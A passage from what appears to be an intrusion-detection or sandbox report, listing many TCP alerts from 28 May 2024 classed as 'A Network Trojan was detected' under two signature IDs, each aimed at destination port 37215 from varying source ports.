          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.937846
          SID:2835222
          Source Port:47116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213509
          SID:2829579
          Source Port:40976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923602
          SID:2835222
          Source Port:56792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400765
          SID:2835222
          Source Port:52054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464381
          SID:2835222
          Source Port:57554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680392
          SID:2835222
          Source Port:59368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.295230
          SID:2835222
          Source Port:49848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.332651
          SID:2835222
          Source Port:53330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941292
          SID:2829579
          Source Port:57596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210299
          SID:2829579
          Source Port:59658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.737943
          SID:2835222
          Source Port:33500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.222572
          SID:2829579
          Source Port:48888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.818830
          SID:2829579
          Source Port:41532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.230227
          SID:2829579
          Source Port:56464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.345809
          SID:2829579
          Source Port:56576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.425082
          SID:2835222
          Source Port:43378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269484
          SID:2835222
          Source Port:40920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.154629
          SID:2829579
          Source Port:45982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.296535
          SID:2835222
          Source Port:46534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.767375
          SID:2835222
          Source Port:57600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.874825
          SID:2829579
          Source Port:56322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.722014
          SID:2835222
          Source Port:41724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.297038
          SID:2829579
          Source Port:33760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.557462
          SID:2835222
          Source Port:55520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.093724
          SID:2835222
          Source Port:52294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.621396
          SID:2835222
          Source Port:46134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328742
          SID:2829579
          Source Port:55918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.160059
          SID:2829579
          Source Port:38764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.663277
          SID:2829579
          Source Port:49798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.978778
          SID:2829579
          Source Port:34492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727947
          SID:2829579
          Source Port:47864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.931002
          SID:2829579
          Source Port:54696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530273
          SID:2829579
          Source Port:38178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.559646
          SID:2829579
          Source Port:42762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475764
          SID:2835222
          Source Port:48378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651496
          SID:2835222
          Source Port:45598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.588991
          SID:2829579
          Source Port:46108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923802
          SID:2829579
          Source Port:43864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.547860
          SID:2829579
          Source Port:49012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.852117
          SID:2835222
          Source Port:55358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.482832
          SID:2835222
          Source Port:36394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978392
          SID:2829579
          Source Port:59534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266423
          SID:2829579
          Source Port:43524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.705779
          SID:2829579
          Source Port:51876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.637158
          SID:2829579
          Source Port:49060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.332637
          SID:2829579
          Source Port:55180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.332729
          SID:2835222
          Source Port:58556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.296283
          SID:2835222
          Source Port:51976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.197212
          SID:2829579
          Source Port:37380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.239977
          SID:2829579
          Source Port:36490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324173
          SID:2835222
          Source Port:56698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195412
          SID:2835222
          Source Port:55490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.686993
          SID:2835222
          Source Port:39284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.231023
          SID:2829579
          Source Port:52724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201227
          SID:2829579
          Source Port:39448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.726945
          SID:2829579
          Source Port:60480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.562196
          SID:2829579
          Source Port:36436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.094010
          SID:2829579
          Source Port:48520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.668085
          SID:2835222
          Source Port:54070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.405305
          SID:2829579
          Source Port:58974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.855558
          SID:2835222
          Source Port:54476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178156
          SID:2829579
          Source Port:59494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.663952
          SID:2829579
          Source Port:37332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.298176
          SID:2829579
          Source Port:45998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.591349
          SID:2835222
          Source Port:57134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268458
          SID:2835222
          Source Port:57106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.605548
          SID:2829579
          Source Port:59146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891879
          SID:2829579
          Source Port:44224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.305635
          SID:2835222
          Source Port:59448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.857164
          SID:2835222
          Source Port:58922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.267130
          SID:2835222
          Source Port:50790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.237080
          SID:2829579
          Source Port:56588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877874
          SID:2829579
          Source Port:33024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.849174
          SID:2829579
          Source Port:45338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.911600
          SID:2835222
          Source Port:44570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962833
          SID:2835222
          Source Port:57886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.817649
          SID:2835222
          Source Port:49222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.738411
          SID:2829579
          Source Port:44356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840470
          SID:2835222
          Source Port:40764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298878
          SID:2835222
          Source Port:54002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529116
          SID:2829579
          Source Port:48658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.371449
          SID:2829579
          Source Port:52990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.496709
          SID:2829579
          Source Port:45648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.975173
          SID:2829579
          Source Port:48764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.602694
          SID:2829579
          Source Port:36362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.681142
          SID:2835222
          Source Port:60044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325267
          SID:2835222
          Source Port:42556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.983715
          SID:2829579
          Source Port:39776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.553968
          SID:2835222
          Source Port:57700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848443
          SID:2835222
          Source Port:60424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.885990
          SID:2835222
          Source Port:41068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.187381
          SID:2829579
          Source Port:45370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146336
          SID:2829579
          Source Port:47558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273248
          SID:2829579
          Source Port:56588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399709
          SID:2829579
          Source Port:48116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102324
          SID:2829579
          Source Port:32816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710975
          SID:2829579
          Source Port:59290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.321108
          SID:2829579
          Source Port:51036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.971347
          SID:2829579
          Source Port:44340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177213
          SID:2835222
          Source Port:43498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.285890
          SID:2829579
          Source Port:48050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.352507
          SID:2829579
          Source Port:44944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978359
          SID:2835222
          Source Port:42180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142528
          SID:2835222
          Source Port:55014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497372
          SID:2829579
          Source Port:36870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651470
          SID:2829579
          Source Port:45594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.908025
          SID:2829579
          Source Port:35378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710175
          SID:2835222
          Source Port:57278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656171
          SID:2829579
          Source Port:48078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196002
          SID:2829579
          Source Port:56558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211586
          SID:2835222
          Source Port:59096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.437848
          SID:2829579
          Source Port:38570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177132
          SID:2835222
          Source Port:53236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.356220
          SID:2835222
          Source Port:33292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322224
          SID:2835222
          Source Port:46730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.305556
          SID:2829579
          Source Port:55830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399920
          SID:2829579
          Source Port:53862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.979042
          SID:2829579
          Source Port:38218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.887990
          SID:2835222
          Source Port:34426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.240542
          SID:2829579
          Source Port:36450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.815453
          SID:2829579
          Source Port:36356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710197
          SID:2829579
          Source Port:33054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891120
          SID:2835222
          Source Port:43948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.931853
          SID:2829579
          Source Port:50248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.060268
          SID:2835222
          Source Port:59612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214864
          SID:2835222
          Source Port:40274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.093754
          SID:2829579
          Source Port:57312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794144
          SID:2835222
          Source Port:56692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.117156
          SID:2835222
          Source Port:41294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.182702
          SID:2835222
          Source Port:55250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102946
          SID:2829579
          Source Port:39822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846900
          SID:2835222
          Source Port:34492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893543
          SID:2835222
          Source Port:43772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535749
          SID:2829579
          Source Port:55296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.659020
          SID:2835222
          Source Port:46276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196215
          SID:2835222
          Source Port:57232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267444
          SID:2835222
          Source Port:41076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115592
          SID:2835222
          Source Port:42618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.486688
          SID:2829579
          Source Port:42350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847582
          SID:2835222
          Source Port:39404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.553851
          SID:2835222
          Source Port:45460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890041
          SID:2835222
          Source Port:36128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.239422
          SID:2835222
          Source Port:60634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156781
          SID:2829579
          Source Port:35010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272394
          SID:2835222
          Source Port:32858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893513
          SID:2829579
          Source Port:37246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666969
          SID:2829579
          Source Port:33306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.234027
          SID:2829579
          Source Port:58452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.805714
          SID:2835222
          Source Port:59486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161771
          SID:2835222
          Source Port:58924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841959
          SID:2829579
          Source Port:50246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.173653
          SID:2829579
          Source Port:41862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.240168
          SID:2829579
          Source Port:33460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656192
          SID:2835222
          Source Port:45126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267605
          SID:2829579
          Source Port:48946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.499745
          SID:2829579
          Source Port:34580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269779
          SID:2835222
          Source Port:60484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.767913
          SID:2829579
          Source Port:58226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298597
          SID:2835222
          Source Port:53512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402359
          SID:2835222
          Source Port:57836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.214820
          SID:2829579
          Source Port:33128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.703883
          SID:2835222
          Source Port:58358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.113060
          SID:2835222
          Source Port:37356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400958
          SID:2829579
          Source Port:51368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.477794
          SID:2829579
          Source Port:43002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.341229
          SID:2835222
          Source Port:43488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144057
          SID:2835222
          Source Port:36654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.359044
          SID:2829579
          Source Port:54468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.774236
          SID:2829579
          Source Port:38330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.155598
          SID:2829579
          Source Port:46990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.235907
          SID:2835222
          Source Port:43124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542065
          SID:2829579
          Source Port:37632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.774295
          SID:2829579
          Source Port:59796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.486639
          SID:2835222
          Source Port:55132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708974
          SID:2835222
          Source Port:38932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.154046
          SID:2829579
          Source Port:46838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271662
          SID:2829579
          Source Port:46140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.174528
          SID:2835222
          Source Port:60054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.273185
          SID:2835222
          Source Port:49032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.223292
          SID:2835222
          Source Port:38956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.560456
          SID:2835222
          Source Port:49054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339305
          SID:2829579
          Source Port:43346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.631457
          SID:2835222
          Source Port:53860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.996650
          SID:2829579
          Source Port:40462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.163819
          SID:2835222
          Source Port:56078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497219
          SID:2829579
          Source Port:44124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.560513
          SID:2835222
          Source Port:55400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891527
          SID:2835222
          Source Port:50422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.814528
          SID:2829579
          Source Port:43574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067238
          SID:2835222
          Source Port:50930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.621406
          SID:2829579
          Source Port:51990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402334
          SID:2829579
          Source Port:56700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.873822
          SID:2829579
          Source Port:36940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176483
          SID:2835222
          Source Port:57548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.486258
          SID:2829579
          Source Port:44720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177310
          SID:2835222
          Source Port:45120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299343
          SID:2835222
          Source Port:54182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
